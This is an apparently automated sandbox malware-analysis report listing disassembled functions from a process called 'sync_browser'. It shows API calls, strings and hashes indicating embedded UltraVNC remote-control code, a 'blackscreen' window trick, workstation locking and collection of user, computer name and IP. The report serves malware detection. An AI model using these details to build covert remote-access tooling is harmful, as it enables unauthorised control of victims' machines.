Service Pack: 6a, xrefs: 00007FF67E7C7D5D
Current user : , xrefs: 00007FF67E7C7EA6
IP : , xrefs: 00007FF67E7C7FB9
, (Alpha64 Processor), xrefs: 00007FF67E7C7B46
%02d, xrefs: 00007FF67E7C7CB3
Build:%d, xrefs: 00007FF67E7C7CF9
v%d., xrefs: 00007FF67E7C7C50

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
API String ID: 171970310-1760265636
Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
Instruction ID: f11de632b630663953b1aa6d1a2c1271af92be01db0e15079aba01c90c450e5f
Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
Instruction Fuzzy Hash: B5B18162A28A8285EB60CB35D8002B977A4FB147B4F444336FA7EC7AD5DF2CE549C310

Function 00007FF67E7C7BA6 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF67E7C7C5B

Part of subcall function 00007FF67E877C50: _errno.LIBCMT ref: 00007FF67E877C88
Part of subcall function 00007FF67E877C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877C93

sprintf.LIBCMT ref: 00007FF67E7C7CC6
sprintf.LIBCMT ref: 00007FF67E7C7D04
sprintf.LIBCMT ref: 00007FF67E7C7D68
GetUserNameA.ADVAPI32 ref: 00007FF67E7C7E9C

Strings

, (IA64 Processor), xrefs: 00007FF67E7C7BB5
ComputerName : , xrefs: 00007FF67E7C7F2C
Service Pack: 6a, xrefs: 00007FF67E7C7D5D
Current user : , xrefs: 00007FF67E7C7EA6
IP : , xrefs: 00007FF67E7C7FB9
%02d, xrefs: 00007FF67E7C7CB3
Build:%d, xrefs: 00007FF67E7C7CF9
v%d., xrefs: 00007FF67E7C7C50

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
API String ID: 171970310-1812746349
Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
Instruction ID: ed369f4f637d8a2e2553fb65ff9fc7548396cc9b314da00fe9b043feb89e2ff2
Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
Instruction Fuzzy Hash: 60B18262A2868285EB61CB35D8002B977A4FB247B4F444336FA7EC7AD5DE2CE549C310

Function 00007FF67E7C7BE2 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF67E7C7C5B

Part of subcall function 00007FF67E877C50: _errno.LIBCMT ref: 00007FF67E877C88
Part of subcall function 00007FF67E877C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877C93

sprintf.LIBCMT ref: 00007FF67E7C7CC6
sprintf.LIBCMT ref: 00007FF67E7C7D04
sprintf.LIBCMT ref: 00007FF67E7C7D68
GetUserNameA.ADVAPI32 ref: 00007FF67E7C7E9C

Strings

ComputerName : , xrefs: 00007FF67E7C7F2C
Service Pack: 6a, xrefs: 00007FF67E7C7D5D
Current user : , xrefs: 00007FF67E7C7EA6
IP : , xrefs: 00007FF67E7C7FB9
%02d, xrefs: 00007FF67E7C7CB3
Build:%d, xrefs: 00007FF67E7C7CF9
, (AMD64 Processor), xrefs: 00007FF67E7C7BF1
v%d., xrefs: 00007FF67E7C7C50

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
API String ID: 171970310-4243357635
Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
Instruction ID: 6b3919e2aba9dcadce16d3d4efd0ffa5b23ee0b6d07fd69454ab179e47d4d3e9
Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
Instruction Fuzzy Hash: B8B18262B2868285EB60CB35D8002B977A4FB147B4F444336FA7EC7AD5DE2CE549C310

Function 00007FF67E7C7B71 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON

Download Yara Rule

APIs

sprintf.LIBCMT ref: 00007FF67E7C7C5B

Part of subcall function 00007FF67E877C50: _errno.LIBCMT ref: 00007FF67E877C88
Part of subcall function 00007FF67E877C50: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E877C93

sprintf.LIBCMT ref: 00007FF67E7C7CC6
sprintf.LIBCMT ref: 00007FF67E7C7D04
sprintf.LIBCMT ref: 00007FF67E7C7D68
GetUserNameA.ADVAPI32 ref: 00007FF67E7C7E9C

Strings

ComputerName : , xrefs: 00007FF67E7C7F2C
Service Pack: 6a, xrefs: 00007FF67E7C7D5D
Current user : , xrefs: 00007FF67E7C7EA6
IP : , xrefs: 00007FF67E7C7FB9
%02d, xrefs: 00007FF67E7C7CB3
Build:%d, xrefs: 00007FF67E7C7CF9
v%d., xrefs: 00007FF67E7C7C50
, (PPC Processor), xrefs: 00007FF67E7C7B80

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
API String ID: 171970310-3099718995
Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
Instruction ID: b1849a759ffac8c4fc55641d77c716c62fdc2078cb3545692721df47c00c0f94
Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
Instruction Fuzzy Hash: 04B18162A2868285EB61CB35D8002B977A4FB247B4F444336FA7EC7AD5DF2CE549C310

Function 00007FF67E7D26B0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 78librarysleeploaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF67E7D26E0
LoadLibraryA.KERNEL32 ref: 00007FF67E7D26F0

Part of subcall function 00007FF67E7D2520: LoadLibraryA.KERNEL32 ref: 00007FF67E7D2551
Part of subcall function 00007FF67E7D2520: GetProcAddress.KERNEL32 ref: 00007FF67E7D256E
Part of subcall function 00007FF67E7D2520: LoadLibraryA.KERNEL32 ref: 00007FF67E7D258B
Part of subcall function 00007FF67E7D2520: GetProcAddress.KERNEL32 ref: 00007FF67E7D25A8
Part of subcall function 00007FF67E7D2520: FreeLibrary.KERNEL32 ref: 00007FF67E7D2658
Part of subcall function 00007FF67E7D2520: FreeLibrary.KERNEL32 ref: 00007FF67E7D2667

GetProcAddress.KERNEL32 ref: 00007FF67E7D2719
GetProcAddress.KERNEL32 ref: 00007FF67E7D2731
Sleep.KERNEL32 ref: 00007FF67E7D2771
GetLastError.KERNEL32 ref: 00007FF67E7D277D
sprintf.LIBCMT ref: 00007FF67E7D2792
OutputDebugStringA.KERNEL32 ref: 00007FF67E7D279C
Sleep.KERNEL32 ref: 00007FF67E7D27A7
FreeLibrary.KERNEL32 ref: 00007FF67E7D27B5
FreeLibrary.KERNEL32 ref: 00007FF67E7D27C3

Strings

LockWorkStation, xrefs: 00007FF67E7D2727
winsta.dll, xrefs: 00007FF67E7D26D9
user32.dll, xrefs: 00007FF67E7D26E6
LockWorkstation failed with error 0x%0X, xrefs: 00007FF67E7D2783
WinStationConnectW, xrefs: 00007FF67E7D270F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
API String ID: 2931780912-670137772
Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
Instruction ID: 0d9b388885e94da4858d7620d3ef74bceb76dd4f64a10a7b56d2f1bf67e1aea3
Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
Instruction Fuzzy Hash: 1D314126B38A4291FA65DF25E5542B5A394EF64BA4F541131FE1E87654DF3CE40EC300

Function 00007FF67E7E2CC0 Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 256COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF67E7E2D28

Part of subcall function 00007FF67E878C34: _FF_MSGBANNER.LIBCMT ref: 00007FF67E878C64
Part of subcall function 00007FF67E878C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF67E88329C,?,?,?,00007FF67E887749,?,?,?,00007FF67E8877F3), ref: 00007FF67E878C89
Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CA2
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CAD
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CB8

Part of subcall function 00007FF67E877BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF67E813771), ref: 00007FF67E877BFE

GetCurrentProcessId.KERNEL32 ref: 00007FF67E7E2D6C

Part of subcall function 00007FF67E877BAC: _getptd.LIBCMT ref: 00007FF67E877BB4

rand.LIBCMT ref: 00007FF67E7E2D90

Part of subcall function 00007FF67E877BC4: _getptd.LIBCMT ref: 00007FF67E877BC8

EnterCriticalSection.KERNEL32 ref: 00007FF67E7E2E5E
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E2E86
malloc.LIBCMT ref: 00007FF67E7E2F54

Part of subcall function 00007FF67E878C34: _callnewh.LIBCMT ref: 00007FF67E878CC8
Part of subcall function 00007FF67E878C34: _errno.LIBCMT ref: 00007FF67E878CCD

free.LIBCMT ref: 00007FF67E7E3019
free.LIBCMT ref: 00007FF67E7E3042
free.LIBCMT ref: 00007FF67E7E3088

Strings

vncclient.cpp : Failed to receive challenge response from client, xrefs: 00007FF67E7E2ECC
View-only password authentication, xrefs: 00007FF67E7E2F94
vncclient.cpp : Failed to send challenge to client, xrefs: 00007FF67E7E3050
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF67E7E2D0B, 00007FF67E7E2F37
password authentication, xrefs: 00007FF67E7E2DAB

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _errnofree$CriticalSectionTime_callnewh_getptdmalloc$AllocCurrentEnterFileHeapLeaveProcessSystemrand
String ID: View-only password authentication$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$password authentication$vncclient.cpp : Failed to receive challenge response from client$vncclient.cpp : Failed to send challenge to client
API String ID: 3991686958-188493154
Opcode ID: d47ab58ef9a5c4c1981abf66f5b4630f0cc57bf6471ba11b6532e0924118c186
Instruction ID: 58f2c86889ed74d889ac5bea1fe34f37925ffa337bc61e6cd529beee9fb0ae16
Opcode Fuzzy Hash: d47ab58ef9a5c4c1981abf66f5b4630f0cc57bf6471ba11b6532e0924118c186
Instruction Fuzzy Hash: CCB1CE23B28A8295FB00DB35D8542FC6366EBA4B58F544232EE1EC76E5EE3CD449C340

Function 00007FF67E7DBB80 Relevance: 24.3, APIs: 16, Instructions: 345COMMON

Download Yara Rule

APIs

GetRegionData.GDI32 ref: 00007FF67E7DBBE4

Part of subcall function 00007FF67E7CFA00: GetRegionData.GDI32 ref: 00007FF67E7CFA4F

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

CreateRectRgn.GDI32 ref: 00007FF67E7DBC88

Part of subcall function 00007FF67E7CF940: CreateRectRgn.GDI32 ref: 00007FF67E7CF972
Part of subcall function 00007FF67E7CF940: CombineRgn.GDI32 ref: 00007FF67E7CF98A
Part of subcall function 00007FF67E7CF940: CombineRgn.GDI32 ref: 00007FF67E7CF99F

SetRectRgn.GDI32 ref: 00007FF67E7DBCC0
CombineRgn.GDI32 ref: 00007FF67E7DBCD9
DeleteObject.GDI32 ref: 00007FF67E7DBCE3
free.LIBCMT ref: 00007FF67E7DBCED

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

DeleteObject.GDI32 ref: 00007FF67E7DBCF5
free.LIBCMT ref: 00007FF67E7DBCFE
CreateRectRgn.GDI32 ref: 00007FF67E7DBDB3
SetRectRgn.GDI32 ref: 00007FF67E7DBDEB
CombineRgn.GDI32 ref: 00007FF67E7DBE01
DeleteObject.GDI32 ref: 00007FF67E7DBE0B
free.LIBCMT ref: 00007FF67E7DBE15
DeleteObject.GDI32 ref: 00007FF67E7DBE1D
free.LIBCMT ref: 00007FF67E7DBE26
GetRegionData.GDI32 ref: 00007FF67E7DBE4B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Rect$CombineDeleteObjectfree$CreateDataRegion$ErrorFreeHeapLast_errnomalloc
String ID:
API String ID: 2853843867-0
Opcode ID: bd85b3d2716f2062e0e78c163eea9bbb0ad23bc5792617f840c8667f8943287e
Instruction ID: c4216b009546780f2359d12ab3a3a98ed1228070499f1d5be17a8da1365898ac
Opcode Fuzzy Hash: bd85b3d2716f2062e0e78c163eea9bbb0ad23bc5792617f840c8667f8943287e
Instruction Fuzzy Hash: 13E1C337B28A9186EB10CB6AE4446ADB7A4FB98B84F105135FE4E93B54DF3CD449CB40

Function 00007FF67E7D6930 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 180windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF67E7D6987

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

Part of subcall function 00007FF67E7D70B0: EnumDisplaySettingsA.USER32 ref: 00007FF67E7D70F4
Part of subcall function 00007FF67E7D70B0: LoadLibraryA.KERNEL32 ref: 00007FF67E7D7109
Part of subcall function 00007FF67E7D70B0: GetProcAddress.KERNEL32 ref: 00007FF67E7D712D
Part of subcall function 00007FF67E7D70B0: FreeLibrary.KERNEL32 ref: 00007FF67E7D71F2

malloc.LIBCMT ref: 00007FF67E7D6996
GetDC.USER32 ref: 00007FF67E7D6A00
GetSystemPaletteEntries.GDI32 ref: 00007FF67E7D6A2A
GetLastError.KERNEL32 ref: 00007FF67E7D6A33
DeleteDC.GDI32 ref: 00007FF67E7D6A64
ReleaseDC.USER32 ref: 00007FF67E7D6A71

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF67E7D6A39
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF67E7D695B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF67E7D6BB2
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF67E7D6A0B
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF67E7D69A4
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF67E7D69F2

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction ID: 7b8947d942d822cf49c48534d1187930084422f8ceabd3f39a06fd2eadb1e803
Opcode Fuzzy Hash: 356ec768b8f7f08761f25f9f6f5bd7aee8d03a8140df0f5e6c97a1197c639f56
Instruction Fuzzy Hash: 89615963B289D141FB18DB68D8552F97794EBA4348F54813AFA9EC7691EE3CD14DC300

Function 00007FF67E7C4390 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 179windowsleepthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 00007FF67E7C4440
CreateThread.KERNEL32 ref: 00007FF67E7C44B9
CloseHandle.KERNEL32 ref: 00007FF67E7C44C7
SendMessageA.USER32 ref: 00007FF67E7C44F7
FindWindowA.USER32 ref: 00007FF67E7C456D
PostMessageA.USER32 ref: 00007FF67E7C4585
SendMessageA.USER32 ref: 00007FF67E7C45AD
mouse_event.USER32 ref: 00007FF67E7C45C5
Sleep.KERNEL32 ref: 00007FF67E7C45D0
mouse_event.USER32 ref: 00007FF67E7C45E7
FindWindowA.USER32 ref: 00007FF67E7C45F6
PostMessageA.USER32 ref: 00007FF67E7C460E

Strings

blackscreen, xrefs: 00007FF67E7C4564, 00007FF67E7C45ED

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
